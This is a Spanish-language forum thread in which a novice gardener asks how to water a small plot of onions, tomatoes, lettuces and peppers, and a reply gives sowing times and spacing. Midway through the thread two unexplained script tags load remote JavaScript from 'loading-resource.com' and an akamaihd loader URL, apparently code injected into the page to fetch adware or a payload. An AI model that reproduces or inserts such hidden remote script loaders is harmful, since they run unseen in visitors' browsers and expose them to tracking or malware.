Mantenimierto huerto pequeño

quisiera sabes cuanta agua ycuantas veces a la semana tengo que echar a un pequeño huerto que he plantado en el jardin, un sobre de semillas de cewbollas,tomates,lechugas y pimientos. Algun consejillo extra no me vendria nada mal, soy primerizo... Muchas gracias por todo

1 Respuesta

Respuesta

Tendrías que ver que lo que plantas, esta en su época, ya la época que es no es tiempo de siembra, comentame exactamente lo que has plantado.

He plantado un sobrecito de semillas de tomate, otro de cebollas, otro de pimientos y otro de lechugas. El huerto es pequeñito, de aprox 3m por 5m

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

lo riego todos los dias ?

Referente a la cebolla La mejor fecha de siembra es a finales de invierno, en el Hemisferio
Norte, la primera semana de marzo, Sembrar a principios de primavera, enterrando la semilla a 1,5 cm en hileras separadas 25 cm entre sí. La germinación se producirá a los 21 días aproximadamente.

Referente a la siembra del pimiento se puede hacer en semilleroa cubierto, en febrero-marzo, a una profundidad de 2-3 mm.. Evita plantar las semillas muy juntas porqueprovoca el desarrollo de plantitas débiles y usa vasitos individuales, Germinan entre 8 y 20 días después. La Plantaciónse hace A los dos meses de la siembra, cuando las plantitas tienen
más de 15 cm de altura, con 5 o 6 hojas, plántalas en líneas, separadas unos 40-50 cm. Entre plantas y de 60-70 cm. Entre líneas.

En cuanto a la lechuga se planta en verano el suelo debe ser rico en materia orgánica para que las plantas crezcan más rápido, o en primavera arenoso, porque se calienta antes y la recolección se puede realizar con más antelación.